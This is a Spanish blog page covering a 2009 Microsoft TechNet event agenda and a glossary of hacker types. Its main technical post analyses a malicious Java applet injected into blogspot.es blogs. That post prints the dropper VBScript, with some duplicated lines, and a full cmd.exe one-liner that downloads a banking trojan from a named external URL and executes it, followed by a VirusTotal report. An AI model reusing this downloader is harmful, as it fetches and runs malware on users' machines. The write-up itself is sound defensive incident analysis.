Microsoft TechNet: Tour de la innovación, (Valladolid) Lanzamiento Windows 7, Windows

Ayer tuvo lugar el Innovation Tour por parte del equipo del TechNet de Microsoft en el Parque Tecnológico de Boecillo (Valladolid) al cuál no me pude resistir y no falte.

Como invitados al evento estuvieron Fernando Guillot y Paulo Días los dos IT Pro Evangelists de Microsoft, Miguel Hernández MVP Small Business Server y como no podía faltar en este tipo de eventos la presencia de Chema Alonso MVP Windows Sever Security de Informática64.

Aquí va la Agenda del Evento:

10:00 – 10:20 –Keynote : “Innovación en tiempo de crisis”

Presentación de toda la gama de nuevos productos de infraestructura con los que suempresa ahorrará costes y será más eficiente

10:30 – 11:15 – Sesión Windows 7:

Primera toma de contacto con Windows 7, información acerca de las distintas versiones de Windows 7 y nuevas características del sistema operativo, demostraciones de la experiencia de usuario (nueva interface touch, jumplists, Internet Explorer 8), mostraremos la utilidad de Problem Steps Recorder y como se ahorrar tiempo y dinero en las empresas con el helpdesk. Compatibilidad de drivers, aplicaciones. Mostraremos Windows XP Mode como mecanismo de compatibilidad y el soporte nativo al formato VHD.

11:15 – 12:00 – Windows 7 y windows Server 2008 R2 Better Together:

En esta sesión vamos a hablar de las opciones de acceso remoto que proporciona la nueva plataforma, empezando en la situación típica actual con VPNs PPTP, pasando por las conexiones SSTP, la solución para SSTP que representa el paso siguiente - VPN Reconnect y de Direct Access. Posibles mejoras en las empresas que tienen pequeñas (o incluso medianas) delegaciones remotas soluciones para estos escenarios BranchCache y como les puede ayudar a mantener un buen equilibrio entre lo que se gastan en las conexiones de estas delegaciones y la experiencia de usuario que obtienen.

12:00 – 12:30 – Café

12:30 – 13:30 – Novedades en Virtualización con Windows Server 2008 R2 y System Center:

Esta sesión mostraremos las novedades en Hyper-V R2, con demostraciones prácticas de: Live Migration y CSVs Hyper-V Server 2008 R2, también se tratara la Virtualización del Escritorio con las siguientes demostraciones: Portal de Autoservicio con acceso a Remote Apps y Pools de VMs (con App-V) Feed del portal en Windows 7, Gestión de entornos virtualizados y heterogéneos. Para finalizar esta sesión hablaremos de las Novedades de SCVMM2008R2, demostraciones Integración con SCOM y soporte a Linux/Unix

13:30 – 14:30 – Novedades de Exchange 2010:

En esta sesión veremos: Principales novedades en Exchange Server 2010, Descripción de los servicios Online de Exchange de Microsoft, Buzones y grupos moderados, Cumplimiento legal con Políticas de archivado y RMS, novedades en Outlook Web Access, Integración con

Mensajería instantánea, alta disponibilidad con Database Availability Groups

Seguridad perimetral e integración con FSE y TMG, escenarios de migración y

Actualización, monitorización con System Center Operations manager 2007 R2

14:30 – 15:30 – Cocktail

15:30 – 17:00 – Novedades de Seguridad en las plataformas Windows y Forefront:

Mecanismos de seguridad que incluyen las nuevas plataformas, tanto de cliente como de servidor, además de la propuesta de Stirling y Forefront Client Security como plataforma de seguridad integrada. Bitlocker, la herramienta de recuperación Diagnostics and Recovery Toolset (DaRT) de MDOP, y luego UAC y Applocker, seguimos con una parte de seguridad en Internet Explorer 8, demostración comparativas con Firefox, SSL Inspection de TMG, Homegroups y el Firewall de Windows 7 Windows Security Essentials) y de Forefront Client Security + Stirling.

Aquí os dejo unas fotos con los verdaderos protagonistas del evento:


Arriba Paulo Días, Fernando Guillot y Miguel Hernández y abajo Chema Alonso


Clasificación de especies

Cracker
Proviene del termino "Criminal hacker", es aquel que viola la seguridad de un sistema informático, con la diferencia de que lo hace con fines de beneficio personal. También es así llamado a quien diseña cracks informáticos para modificar el comportamiento del software o hardware original sin que pueda ser dañino para el usuario del mismo

Hacker
Son aquellas personas que poseen un amplio conocimiento de alguna de las ramas de la informática. Según sus acciones pueden clasificarse en White Hats, acciones buenas como descubrir los agujeros de seguridad de un programa y notificarlos a la comunidad informática) o Black Hats, descubren los fallos de un programa y lo usan en beneficio propio

Lamer
Proviene del ingles "incompetente", "falto de inteligencia", personas con una boca mas grande que sus habilidades. Suelen ser personas que alardean de ser hackers cuando en realidad utilizan programas de fácil manejo creado por los auténticos hackers sin obtener los resultados que ellos pretendían.

Script kiddie
Es aquella persona que presume de hacker o cracker cuando en realidad no posee un grado de conocimientos suficientes. Se podría decir que es la siguiente fase del lamer.

Phreaker
Es una persona que mediante el uso de la tecnología es capaz de interferir en los sistemas telefónicos de forma ilegal

Geek
Es una persona que comparte una fascinación obsesiva por la tecnología y la imaginación. Se trata de una persona extravagante y extrovertida, tanto en el estilo de vida como en la forma de ser, que hace las cosas por el reconocimiento y la diversión.

Nerd
Es una persona con gran inteligencia y pasión con el conocimiento que tiende a apartarse de la corriente social. Menos extravagante que un Geek

Spammer
Persona que roba o compra direcciones de correo electrónico sustraídas y remite e-mails no solicitados

Gurus
Son los expertos en algun área, entiendase por experto conocer "TODO". Se suelen encargar de formar a futuros hackers

CopyHackers
Falsificadores que comercializan todo lo copiado

Bucaneros
Personas con escaso conocimiento informatico que se dedican a la venta de productos comprados a los copyhackers

Newbie
Son los novatos del hackero

Wannaber
Newbie que desea ser hacker pero estos consideran que su coeficiente no da para tal fin (Wannaber= wanna be =quiero ser)

Samurai
Son los llamados "hackers a sueldo" trabajan solos y saben que todo puede ser tumbado si se tiene dinero suficiente para pagarlo

Creadores de virus
Aqui se ha de diferenciar entre el programador del virus y el propagador, sienten un gran placer al ver que su "software" ha sido ampliamente "adquirido" por el publico

Explo1ter
Son personas que aprovechan un error en la programación de un programa para obtener diversos privilegios sobre el software

Fuente: Wikipedia


Extraído de http://unlugarsinfin.blogspot.es


¡Comprometidos los blogs de blogspot.es!

Ahora que los chicos de blogspot.es han solucionado el problema (durante la tarde del Lunes 19 de Octubre), puedo comentar esta noticia.


El pasado viernes 16 de octubre por la mañana, me encontré con una sorpresa al acceder a este mismo blog que estáis leyendo, a nuestro queridísimo blog http://unlugarsinfin.blogspot.es.


De repente, un mensaje me solicitaba confiar en la ejecución de un applet firmado por www.eternalcog.org.


Evidentemente, no se trataba de ninguna funcionalidad nueva de nuestro servidor de hosting gratuito, pues el firmante se trataba, nada más y nada menos, de la Eterna Iglesia de Dios (toma ya, con la Iglesia hemos topado).


Viendo el código fuente de la página, en seguida te percatabas de lo ocurrido...


En el apartado ‘Acerca de’ presente en la columna de la izquierda de nuestro blog, presente en todas las plantillas de blogspot.es y por tanto presente en todos los blogs de blogspot.es, nos encontramos con el siguiente código:


Un lugar sin fin


¡Se trataba pues de una infección mediante Java Applet (y VBScript) que afectaba a todos los blogs de blogspot.es!.


Para corroborarlo (bueno sí, y por curiosidad), decidí ahondar más en la infección.


Normalmente, en este tipo de infecciones, mediante la ejecución de un Applet en Java y un script en VBScript o Batch, es posible descargar y ejecutar un programa remoto en un pc tan sólo con un click. Basta decir que se confía en el applet que se intenta ejecutar.


Pues bien, en un entorno mega-virtual (sandbox) para pruebas y demás (tengo que quedar bien, claro ;-)) aceptamos confiar en el applet y observamos los resultados.


La primera impresión fue la siguiente:


Efectivamente, el applet creaba un VBScript en la ruta de instalación de mi Firefox con el siguiente contenido:


Const adTypeBinary = 1

Const adSaveCreateOverWrite = 2

Dim BinaryStream

Dim BinaryStream

Set BinaryStream = CreateObject("ADODB.Stream")

Dim BinaryStream

Dim BinaryStream

BinaryStream.Type = adTypeBinary

Set BinaryStream = CreateObject("ADODB.Stream")

BinaryStream.Open

BinaryStream.Open

BinaryStream.Write BinaryGetURL(Wscript.Arguments(0))

BinaryStream.Write BinaryGetURL(Wscript.Arguments(0))

BinaryStream.Open

BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite

Function BinaryGetURL(URL)

Dim Http

Set Http = CreateObject("WinHttp.WinHttpRequest.5.1")

Http.Open "GET", URL, False

Http.Send

BinaryGetURL = Http.ResponseBody

End Function

Set shell = CreateObject("WScript.Shell")

shell.Run "xxx.exe"


y, a través del mismo, intentaba descargar y ejecutar el siguiente fichero http://www.discounttart.co.uk/newsletter/adobe.jpg renombrado a ‘xxx.exe’.


Veámoslo más en detalle a través de los comandos y procesos que lanzaba el applet:




Y a continuación, vemos las propiedades de uno de ellos:


Lo tenemos. El comando que ejecutaba el applet es el siguiente:


cmd.exe /c echo Const adTypeBinary = 1 > poq.vbs & echo Const adSaveCreateOverWrite = 2 >> poq.vbs & echo Dim BinaryStream >> poq.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> poq.vbs & echo BinaryStream.Type = adTypeBinary >> poq.vbs & echo BinaryStream.Open >> poq.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> poq.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> poq.vbs & echo Function BinaryGetURL(URL) >> poq.vbs & echo Dim Http >> poq.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> poq.vbs & echo Http.Open "GET", URL, False >> poq.vbs & echo Http.Send >> poq.vbs & echo BinaryGetURL = Http.ResponseBody >> poq.vbs & echo End Function >> poq.vbs & echo Set shell = CreateObject("WScript.Shell") >> poq.vbs & echo shell.Run "xxx.exe" >> poq.vbs & start poq.vbs http://www.discounttart.co.uk/newsletter/adobe.jpg xxx.exe


A estas alturas, ya sabemos de que se trataba la infección: llamaba y ejecutaba un applet desde una web externa (al parecer también comprometida) y se descargaba y ejecutaba un fichero de otra:



Pero ¿qué hace ese fichero adobe.jpg? ¿Qué tipo de malware conlleva?


Subimos el fichero adobe.jpg a Virustotal y salimos de dudas: se trata de un troyano que intenta robar información relacionada con las transacciones comerciales y bancarias del usuario infectado, el Trojan-Spy.Win32.Banker, que además y como podemos ver abajo, tiene un bajo índice de detecciones por la mayoría de motores de antivirus.


En resumen, hemos sido principales testigos de una infección que ha podido afectar y comprometer a miles de usuarios. Por mi parte, intenté avisar a los administradores de blogspot.es y, si bien han solucionado el problema, todavía no he recibido contestación alguna (ni creo que la reciba, con todo el lío que han tenido que

tener).


Daré más datos siempre que reciba más información y la seguridad y ética me lo permitan ;-)


Análisis del archivo adobe.jpg recibido el 2009.10.19 15:08:42 (UTC)

Resultado: 7/40 (17.5%)

Motor antivirus

Versión

Última actualización

Resultado

a-squared

4.5.0.41

2009.10.19

Trojan-Spy.Win32.Banker.ARQ!IK

AhnLab-V3

5.0.0.2

2009.10.19

-

AntiVir

7.9.1.35

2009.10.19

-

Antiy-AVL

2.0.3.7

2009.10.19

-

Authentium

5.1.2.4

2009.10.19

-

Avast

4.8.1351.0

2009.10.18

-

AVG

8.5.0.420

2009.10.19

-

BitDefender

7.2

2009.10.19

Gen:Trojan.Heur.jm0@sTnLSqnib

CAT-QuickHeal

10.00

2009.10.18

-

ClamAV

0.94.1

2009.10.19

-

Comodo

2657

2009.10.19

-

DrWeb

5.0.0.12182

2009.10.19

-

eSafe

7.0.17.0

2009.10.19

-

eTrust-Vet

35.1.7074

2009.10.19

-

F-Prot

4.5.1.85

2009.10.18

-

F-Secure

9.0.15300.0

2009.10.16

Gen:Trojan.Heur.jm0@sTnLSqnib

Fortinet

3.120.0.0

2009.10.19

-

GData

19

2009.10.19

Gen:Trojan.Heur.jm0@sTnLSqnib

Ikarus

T3.1.1.72.0

2009.10.19

Trojan-Spy.Win32.Banker.ARQ

Jiangmin

11.0.800

2009.10.19

-

K7AntiVirus

7.10.874

2009.10.19

-

Kaspersky

7.0.0.125

2009.10.19

-

McAfee

5775

2009.10.18

-

McAfee+Artemis

5775

2009.10.18

-

McAfee-GW-Edition

6.8.5

2009.10.19

-

Microsoft

1.5101

2009.10.19

-

NOD32

4522

2009.10.19

-

Norman

6.03.02

2009.10.19

W32/Obfuscated.H2!genr

nProtect

2009.1.8.0

2009.10.19

-

Panda

10.0.2.2

2009.10.18

Suspicious file

Prevx

3.0

2009.10.19

-

Rising

21.52.04.00

2009.10.19

-

Sophos

4.46.0

2009.10.19

-

Sunbelt

3.2.1858.2

2009.10.18

-

Symantec

1.4.4.12

2009.10.19

-

TheHacker

6.5.0.2.047

2009.10.19

-

TrendMicro

8.950.0.1094

2009.10.19

-

VBA32

3.12.10.11

2009.10.18

-

ViRobot

2009.10.19.1993

2009.10.19

-

VirusBuster

4.6.5.0

2009.10.19

-

Información adicional

Tamano archivo: 147456 bytes

MD5...: 3afcb4180f095a4e173c31eae957865e

SHA1..: 501e9c3961f290f35ce67128c2b4e6b6486d3286

SHA256: 50da17057b780bc7b78a5d8588c55412b7ea4323bd5a0b264fb6e5552315ef16

ssdeep: 3072:tjNuE+Yj+LqwWh3aOxyrwG9XhVRG1uWB8xOU75xKsAd:tXOWh3aOxysG9Xh
VRG1uWB8xOU75xK

PEiD..: -

PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x2698
timedatestamp.....: 0x4ada75b2 (Sun Oct 18 01:56:02 2009)
machinetype.......: 0x14c (I386)

( 3 sections )
name viradd virsiz rawdsiz ntrpy md5
.text 0x1000 0x1e824 0x1f000 5.71 987cd15991770991e1f15e7e73f63c3c
.data 0x20000 0x16e8 0x1000 0.00 620f0b67a91f7f74151bc5be745b7110
.rsrc 0x22000 0x2b5a 0x3000 4.18 2871f25d7b9eff57b91e38761a302c49

( 1 imports )
> MSVBVM60.DLL: __vbaVarTstGt, __vbaVarSub, __vbaStrI2, _CIcos, _adj_fptan, __vbaStrI4, __vbaVarMove, __vbaFreeVar, __vbaLenBstr, __vbaStrVarMove, __vbaPut3, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, -, __vbaFreeObjList, -, -, __vbaStrErrVarCopy, _adj_fprem1, __vbaRecAnsiToUni, -, -, __vbaStrCat, -, __vbaLsetFixstr, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, -, __vbaExitProc, -, -, __vbaOnError, -, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, -, -, __vbaStrFixstr, -, __vbaFpR8, __vbaBoolVarNull, _CIsin, __vbaErase, -, -, -, -, __vbaChkstk, -, __vbaFileClose, EVENT_SINK_AddRef, -, __vbaGenerateBoundsError, -, __vbaStrCmp, __vbaVarTstEq, __vbaI2I4, DllFunctionCall, __vbaRedimPreserve, _adj_fpatan, __vbaFixstrConstruct, __vbaRedim, __vbaRecUniToAnsi, EVENT_SINK_Release, -, __vbaUI1I2, _CIsqrt, __vbaVarAnd, EVENT_SINK_QueryInterface, __vbaUI1I4, __vbaExceptHandler, -, -, __vbaStrToUnicode, __vbaPrintFile, _adj_fprem, _adj_fdivr_m64, -, -, -, __vbaFPException, __vbaInStrVar, -, __vbaUbound, __vbaStrVarVal, __vbaVarCat, __vbaI2Var, -, -, _CIlog, __vbaErrorOverflow, -, __vbaFileOpen, -, -, __vbaInStr, __vbaNew2, _adj_fdiv_m32i, -, _adj_fdivr_m32i, -, __vbaStrCopy, -, __vbaFreeStrList, -, _adj_fdivr_m32, _adj_fdiv_r, -, __vbaVarTstNe, __vbaI4Var, __vbaVarCmpEq, __vbaAryLock, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, __vbaFpI2, __vbaFpI4, -, __vbaVarCopy, -, _CIatan, -, __vbaCastObj, __vbaAryCopy, __vbaStrMove, _allmul, _CItan, __vbaAryUnlock, __vbaUI1Var, __vbaFPInt, _CIexp, __vbaFreeObj, __vbaFreeStr, -

( 0 exports )

RDS...: NSRL Reference Data Set
-

pdfid.: -

trid..: Win32 Executable Microsoft Visual Basic 6 (86.2%)
Win32 Executable Generic (5.8%)
Win32 Dynamic Link Library (generic) (5.1%)
Generic Win/DOS Executable (1.3%)
DOS Executable Generic (1.3%)

sigcheck:
publisher....: sony
copyright....: n/a
product......: terra
description..: n/a
original name: jh.exe
internal name: jh
file version.: 2.00
comments.....: n/a
signers......: -
signing date.: -
verified.....: Unsigned


Extraído de http://unlugarsinfin.blogspot.es